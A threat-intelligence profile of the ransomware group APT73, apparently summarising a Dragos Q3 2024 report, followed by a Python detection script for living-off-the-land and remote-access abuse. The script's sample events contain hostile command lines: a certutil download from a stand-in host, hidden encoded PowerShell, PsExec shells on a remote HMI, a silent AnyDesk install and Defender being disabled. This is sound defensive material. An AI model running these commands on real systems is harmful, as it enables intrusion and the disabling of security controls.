The Dragos *Industrial Ransomware Analysis: Q3 2024* report observed 23 new ransomware groups targeting industrial organizations in Q3 2024.
# Threat Actor: APT73
## Attribution & Identity
* **Identification:** APT73
* **Aliases/Associations:** Assessed to be linked to remnants of LockBit affiliates; the link rests on APT73's repurposing of LockBit operational techniques rather than on a confirmed organizational tie.
## Activity Summary
The Dragos *Industrial Ransomware Analysis: Q3 2024* report lists APT73 among the 23 ransomware groups that impacted industrial organizations during the quarter. In Q3 2024 the group was noted for introducing new payloads designed to evade detection and maintain a foothold in targeted environments.
## Tactics, Techniques & Procedures
- **LockBit lineage:** Repurposing of LockBit operational techniques.
- **New payloads:** Introduction of new, evasion-oriented payloads to defeat detection and keep access.
- **Living-off-the-land:** Blending in with legitimate administrative activity by using built-in or signed tools such as PowerShell, certutil.exe, and PsExec.
- **Abusing remote access tools:** Increased use of AnyDesk and Quick Assist, alongside custom scripts that disable antivirus protection.
- **Targeting virtual environments:** Not specifically attributed to APT73 in the source excerpt; related groups in the same report targeted VMware ESXi.
- **Combined attacks:** Across the groups in the report, attackers generally combined vulnerability exploitation with credential-based attacks to bypass MFA protections.
- **VPN exploitation:** The report notes an increasing trend of exploiting VPN vulnerabilities for initial access.
## Targeting
* **Sectors:** Industries with a low tolerance for downtime, including healthcare, financial services, and industrial operations (sectors where operational disruption leads to cascading impacts).
* **Geography:** Not explicitly detailed for APT73; the breadth of impacted industrial sectors implies global targeting.
* **Victims:** Specific victims for APT73 were not named in the description.
## Tools & Infrastructure
* **Malware families used:** New, unspecified payloads introduced by the group for detection evasion.
* **Infrastructure:** Not explicitly detailed.
## Implications
APT73 represents a persistent threat descended from an established ransomware lineage (LockBit remnants) that is still evolving, as shown by its development of new evasion-oriented payloads. Its activity underscores the continued risk to critical infrastructure and other sensitive sectors, where downtime translates directly into operational impact and, from the attacker's perspective, into a higher perceived likelihood of ransom payment.
## Mitigations
- Hunt for novel payloads rather than relying on signature matches alone: alert on first-seen executables and scripts, especially those that touch security tooling, and investigate them as potential evasion tooling.
- Log and alert on command lines of legitimate administrative tools (PowerShell, certutil.exe, PsExec) that indicate malicious use, such as encoded or hidden PowerShell, certutil fetching content from a URL, or PsExec launching a shell on a remote host (living-off-the-land defense).
- Restrict remote access tools such as AnyDesk and Quick Assist to an approved set of hosts and accounts, block unapproved installations, and alert on scripts that disable security controls (for example, Defender real-time protection being turned off).
- Because the report ties initial access to VPN vulnerability exploitation and to credential attacks that bypass MFA, patch internet-facing VPN appliances promptly and prefer phishing-resistant MFA for remote access.
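To make the living-off-the-land and remote-access-tool monitoring above concrete, the following is an added example, not code from the Dragos report or from APT73's tooling. It assumes Sysmon-style process-creation events serialized as JSON lines with `CommandLine`, `User`, `ProcessId` and `Computer` fields; the rule patterns, the hypothetical help-desk allowlist `QUICKASSIST_ALLOWED_USERS`, and the sample events are all constructed for illustration and should be tuned against real telemetry before use.

```python
"""Hypothetical detection of living-off-the-land and remote-access-tool abuse
over constructed Windows process-creation events (Sysmon Event ID 1 style,
one JSON object per line).

Added example for this page, not code from the Dragos report or from APT73.
Field names, the help-desk allowlist and the sample events are assumptions;
tune the patterns against your own telemetry before deploying."""
import json
import re
from typing import Dict, List

# Accounts permitted to launch Quick Assist (assumption: a help-desk role).
QUICKASSIST_ALLOWED_USERS = {"corp\\helpdesk01"}

# (rule name, ATT&CK technique, regex over the lower-cased command line)
RULES = [
    # certutil abused as a downloader
    ("certutil_download", "T1105",
     re.compile(r"certutil(\.exe)?\b.*-urlcache\b.*-f\b.*https?://")),
    # PowerShell with an encoded command, hidden window or policy bypass
    ("powershell_encoded", "T1059.001",
     re.compile(r"powershell(\.exe)?\b.*\s(-enc(odedcommand)?|-e)\s+[a-z0-9+/=]{20,}")),
    ("powershell_hidden_or_bypass", "T1059.001",
     re.compile(r"powershell(\.exe)?\b.*(-w(indowstyle)?\s+hidden|-e(xecutionpolicy|p)\s+bypass)")),
    # PsExec against a remote host, running as SYSTEM or spawning a shell
    ("psexec_remote_exec", "T1569.002",
     re.compile(r"psexec(64)?(\.exe)?\b.*\\\\[\w.-]+.*(\s-s\b|cmd(\.exe)?\b|powershell)")),
    # AnyDesk installed silently or configured to start with Windows
    ("anydesk_unattended_install", "T1219",
     re.compile(r"anydesk(\.exe)?\b.*(--install|--silent|--start-with-win)")),
    # Defender real-time protection disabled, service stopped, or exclusion added
    ("defender_tamper", "T1562.001",
     re.compile(r"set-mppreference\b.*-disable(realtimemonitoring|ioavprotection|behaviormonitoring)\s+\$?true"
                r"|sc(\.exe)?\s+(stop|config)\s+windefend"
                r"|add-mppreference\b.*-exclusionpath")),
]


def _alert(event: Dict, name: str, technique: str) -> Dict:
    return {"rule": name, "technique": technique, "host": event.get("Computer"),
            "user": event.get("User"), "pid": event.get("ProcessId"),
            "cmd": event.get("CommandLine")}


def evaluate_event(event: Dict) -> List[Dict]:
    """Return one alert per rule that matches a single process-creation event."""
    lowered = event.get("CommandLine", "").lower()
    user = event.get("User", "").lower()
    alerts = [_alert(event, name, technique)
              for name, technique, pattern in RULES if pattern.search(lowered)]
    # Quick Assist is legitimate for help-desk staff; flag any other launcher.
    if "quickassist.exe" in lowered and user not in QUICKASSIST_ALLOWED_USERS:
        alerts.append(_alert(event, "quickassist_unexpected_user", "T1219"))
    return alerts


def scan(jsonl: str) -> List[Dict]:
    """Run every rule over a JSON-lines stream of process-creation events."""
    alerts: List[Dict] = []
    for line in jsonl.splitlines():
        if line.strip():
            alerts.extend(evaluate_event(json.loads(line)))
    return alerts


# Constructed sample telemetry (not real victim data); 203.0.113.10 is a
# documentation-range address. Event order: benign certutil, certutil
# download, encoded+hidden PowerShell, PsExec to an HMI, silent AnyDesk
# install, Defender tampering, Quick Assist by a normal user, Quick Assist
# by the allowlisted help-desk account.
SAMPLE_EVENTS = [
    {"Computer": "ENG-WS-07", "User": "CORP\\jsmith", "ProcessId": 4120,
     "CommandLine": "certutil -hashfile C:\\Windows\\System32\\kernel32.dll SHA256"},
    {"Computer": "ENG-WS-07", "User": "CORP\\jsmith", "ProcessId": 4188,
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/u.dat C:\\Users\\Public\\u.dat"},
    {"Computer": "ENG-WS-07", "User": "CORP\\jsmith", "ProcessId": 4201,
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"Computer": "ENG-WS-07", "User": "CORP\\jsmith", "ProcessId": 4230,
     "CommandLine": "PsExec64.exe \\\\OT-HMI-02 -s -accepteula cmd.exe /c whoami"},
    {"Computer": "OT-HMI-02", "User": "NT AUTHORITY\\SYSTEM", "ProcessId": 912,
     "CommandLine": "\"C:\\Users\\Public\\AnyDesk.exe\" --install \"C:\\Program Files (x86)\\AnyDesk\" --start-with-win --silent"},
    {"Computer": "OT-HMI-02", "User": "NT AUTHORITY\\SYSTEM", "ProcessId": 944,
     "CommandLine": "powershell.exe -Command \"Set-MpPreference -DisableRealtimeMonitoring $true\""},
    {"Computer": "ENG-WS-03", "User": "CORP\\jsmith", "ProcessId": 5010,
     "CommandLine": "QuickAssist.exe"},
    {"Computer": "ENG-WS-03", "User": "CORP\\helpdesk01", "ProcessId": 5022,
     "CommandLine": "QuickAssist.exe"},
]
SAMPLE_JSONL = "\n".join(json.dumps(e) for e in SAMPLE_EVENTS)

if __name__ == "__main__":
    for a in scan(SAMPLE_JSONL):
        print(f"[{a['technique']}] {a['rule']} on {a['host']} by {a['user']}: {a['cmd']}")
```

The benign `certutil -hashfile` event and the help-desk Quick Assist launch produce no alerts, which is the point of matching on argument patterns and an account allowlist rather than on the tool name alone: these binaries are legitimate on most hosts, and the signal is how they are invoked and by whom. The sequence the remaining events trace (download, hidden PowerShell, lateral movement to an HMI, unattended remote-access install, then Defender disabled) is the pattern the report's TTP section describes, and correlating those alerts by host and time is how it would be triaged in practice.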